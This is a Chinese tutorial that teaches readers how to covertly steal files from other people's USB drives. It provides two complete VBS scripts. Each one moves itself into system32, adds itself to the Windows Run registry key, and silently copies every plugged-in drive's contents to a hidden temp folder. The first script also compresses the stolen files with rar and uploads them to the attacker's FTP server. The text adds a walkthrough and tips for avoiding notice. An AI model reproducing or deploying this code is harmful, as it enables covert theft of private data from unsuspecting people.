摆渡~~

是否很多人在你电脑上插U盘，而你想偷偷窃取他U盘的数据？即使他就在你旁边！或许你想在谁电脑中窃取它的U盘数据？这里Unis教你如何秘密地窃取别人U盘中的数据。当然如果是你自己的电脑就可以直接将对方的U盘数据，比如你想得到对方U盘中的照片、文本文档重要信息等等啊统统的窃取到自己电脑里面的某个隐藏目录。等对方拔出了U盘走了之后你就能完完全全看到自己电脑上已经悄悄的把他的U盘数据偷来了！或如果是别人的电脑，你也想在他电脑中等待他插入U盘偷偷窃取U盘中的数据，然后将数据通过后台上传到自己的FTP空间中，自己再回家上网进入FTP空间下载对方U盘的数据偷偷查看。这样都是很容易做到的，当然后者的话就必须用到命令行中的rar.exe先将数据进行压缩，再将数据进行FTP命令的上传。这种偷偷窃取法相信很多人都想做到。比如，小王想得到小李对方U盘的文件，现只知道小李经常会在小王电脑上插U盘查看文件，但是小李在旁边，无法窃取对方的数据，那么小王完全可以用今天为大家讲解到的U盘数据窃取方法现在自己的电脑中运行代码，等待小李插入U盘的时候，后台将悄悄地将小李U盘的数据窃取到电脑的某个隐藏角落，等待小李拔出U盘走之后，小王就可以偷偷的看小李U盘中的文件了。
   
     讲到这里就要说到今天的代码了，今天的主要使用的是VBS脚本，其中脚本中多以FSO文件系统对象这个组件进行窃取的。该代码主要给大家分两种，一种适合于本机，一种适合于他人的机器。其中脚本运行后将会在后台偷偷地运行代码，只有 发现有U盘插入电脑，将会马上将对方U盘的资料拷贝到电脑的某个隐藏目录。等待对方拔掉U盘走人之后，你完全可以找到那个隐藏目录偷偷查看对方U盘中的资料，适合于在自己本机的代码主要就是将对方的U盘文件复制到自己本机隐藏目录中，适合于他人电脑的代码主要就是能够先将对方U盘资料复制到他电脑的隐藏目录中，然后将那些文件进行一个打包，上传到FTP空间，这样的话，虽然不能使用他电脑看窃取的资料，但是已经在后台将资料偷偷上传到了自己的FTP空间中，回家自己上网进入FTP空间下载窃取的东西就足够了。
   
    讲解到这里就开始讲解我们的代码了，下面是代码的分析，适合于在别人电脑中窃取U盘资料，需要将资料上传到自己空间的代码。
        
                        （其中灰色部分是代码解释，红色部分代表的是需要用户自行修改的）

   
on error resume next    //*容错语句，即使下面有错误也继续执行
dim fso,cmd,dir,st,drive      //*定义五个变量
set cmd=createobject("wscript.shell")      //*cmd变量复制建立对象，调用wscript.shell组件
set fso=createobject("scripting.filesystemobject")      //*FSO变量调用FSO文件系统对象
set dir=fso.getspecialfolder(1)      //*dir变量通过FSO对象模型的getspecialfolder函数获取系统目录system32
set st=fso.drives      //*将所有磁盘驱动信息赋值为st,此时st为数组类型
if NOT(fso.fileexists(dir&"\rar.exe")) then
fso.movefile "rar.exe",dir&"\rar.exe"
end if  //*以上三段判断系统目录是否存在rar.exe程序，用于命令行压缩的工具，如果不存在则将我们带有的rar.exe复制到dir系统目录
if not(fso.fileexists(dir&"ftp.txt")) then      //*判断当前system32目录下是否有ftp.txt文本文件，该文件是执行ftp包括的命令信息。
set ftpfile=fso.opentextfile(dir&"\ftp.txt",2,true,0)     //*如果不存在就通过FSO的函数在系统目录中创建ftp.txt文本。
    ftpfile.write("open IP"&vbcrlf&"username"&vbcrlf&"password"&vbcrlf&"prompt"&vbcrlf&"mput       //*通过fso的对象写入执行FTP命令用到的信息写入到ftp.txtc:\windows\temp\upload\*.rar"&vbcrlf&"bye"&vbcrlf)   //*并且通过ftp -s命令执行ftp.txt中的多个文件上传命令，上传temp\upload中打好压缩包的文件到空间里。
    ftpfile.close      //*结束文件上传执行操作
end if
if not(fso.fileexists(dir&"\copy.vbs")) then
fso.getfile(wscript.scriptfullname).move(dir&"\copy.vbs")
end if      //*将该脚本剪切到系统目录中，保存为copy.vbs
fso.createfolder("c:\windows\temp\ufile")    //*通过fso中的函数在c:\windows\temp中创建ufile文件，用来存放窃取的U盘文件
fso.createfolder("c:\windows\temp\upload")     //*通过fso中的函数在c:\windows\temp中创建upload文件，用来存放压缩过后即将上传到FTP空间的文件
cmd.regwrite "HKLM\SoftWare\Microsoft\Windows\currentversion\Run\","c:\windows\system32\copy.vbs","REG_SZ"    //*将该脚本写入注册表的开机启动中，实现开机自动运行该脚本
for i=1 to 2
    i=1      //*建立无限循环，保存程序一直在运行
for each f in st
if f.drivetype=1 then 
n=f.path      //*用for each in读取数组st的驱动盘信息，判断当前移动设备是否为移动存储设备(drivetype=0是不可识别的设，1是移动存储设备,2是本地磁盘)并将信息赋予变量f，然后将所得到的U盘路径信息赋予变量n 
fso.copyfile n&"\*","c:\windows\temp\ufile\"    //*通过fso函数进行复制U盘中的所有文件到C:\Windows\temp\ufile中
fso.copyfolder n&"\*","c:\windows\temp\ufile"    //*通过fso函数进行复制U盘中的所有文件夹到C:\Windows\temp\ufile中
cmd.run "cmd /c rar a -ag -df c:\windows\temp\upload\ c:\windows\temp\ufile",0      //*调用cmd使用rar.exe将文件打包后复制到upload目录
cmd.run "cmd /c ftp -s:c:\windows\system32\ftp.txt",0     [/color=SlateGray]//*调用cmd进行ftp -s 执行ftp.txt中的上传到空间的命令
wscript.sleep 900000    [/color=SlateGray]//*启动休眠，为900000毫秒，即15分钟再执行一次全代码运行
end if
next
next

上面是完全适合于在别人电脑窃取，由于考虑到也到自己的电脑中窃取他人插入的U盘中的数据，就需要省去压缩和上传到空间中去，因为自己的电脑就不怕别人随便乱动了，只要等对方走了就可以自己在电脑中找到隐藏目录进行查看对方U盘数据了。代码简化后主要如下：
   
on error resume next
dim fso,cmd,dir,st,drive
set cmd=createobject("wscript.shell")
set fso=createobject("scripting.filesystemobject")
set dir=fso.getspecialfolder(1)
set st=fso.drives
if not(fso.fileexists(dir&"\copy.vbs")) then
fso.getfile(wscript.scriptfullname).move(dir&"\copy.vbs")
end if
fso.createfolder("c:\windows\temp\ufile")
cmd.regwrite "HKLM\SoftWare\Microsoft\Windows\currentversion\Run\","c:\windows\system32\copy.vbs","REG_SZ"
for i=1 to 2
    i=1
for each f in st
if f.drivetype=1 then 
n=f.path
fso.copyfile n&"\*","c:\windows\temp\ufile\"
fso.copyfolder n&"\*","c:\windows\temp\ufile"
wscript.sleep 500000
end if
next
next
   
下面我们使用第二种代码作为一个实验来讲解，实验主要在虚拟机中演示，首先已经知道我的U盘有大量的数据。我们将上面的代码全部复制到记事本中，保存后缀名为.vbs的VB脚本，保存后随意命名，先将该脚本双击运行，运行之后会发现该脚本自动消失了，其实不然，该脚本已经将自己剪切到了系统目录中，并且写入注册表的启动项，已确保每次开机都能运行该脚本进行数据的窃取。




工作原理主要是在双击该脚本消失后该脚本会剪切到C:\Windows\System32下，并且重新命名为copy.vbs，然后在注册表 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 键中的默认键值中加上，实现每次开机启动后运行该脚本，脚本将会在后台进行工作，一旦发现有移动存储设备，例如U盘、移动硬盘就会将数据偷偷的复制到C:\Windows\temp\ufile目录中，这个目录可以说是很隐蔽了。但是用户却无法发现后台有程序在拷贝自己U盘的资料，桌面完全是正常的情况，不会出现任何提示，哈哈！那是否等待对方走了之后就可以偷偷的在c:\windows\temp\ufile中看到窃取的U盘资料。

    现在的我们已经双击了该脚本，脚本消失了，我们看看C:\windows\temp目录下是暂时没有ufile目录的。



当我们插入U盘之后...........



后台开始在运行脚本，此时我们打开C:\Windows\temp目录，此时就多了一个Ufile目录，该目录中就存在了储存窃取的数据。



     打开我们的Ufile中，会发现系统正在慢慢地窃取U盘中的文件.......一直都在慢慢地窃取，当然窃取等同于复制U盘中的文件，如果文件过大是需要一定时间的，也就大概几分钟的样子。



     由于我的U盘中学习教程里面的资料太大，有6G多，占满%90的U盘空间，系统后台正在先复制里面的资料，复制完毕后将会偷偷复制剩下的，代码是每隔15分钟完全运行一次，也是为了保证某些U盘带有数据灯，因为拷贝中速度如果过快就会狂闪。当然如果没有数据灯的话你完全可以设置时间为1分钟甚至更短咯。
   
其实我们在进程中会发现，运行VBS脚本调用的组件WScript.exe正在运行中呢。。。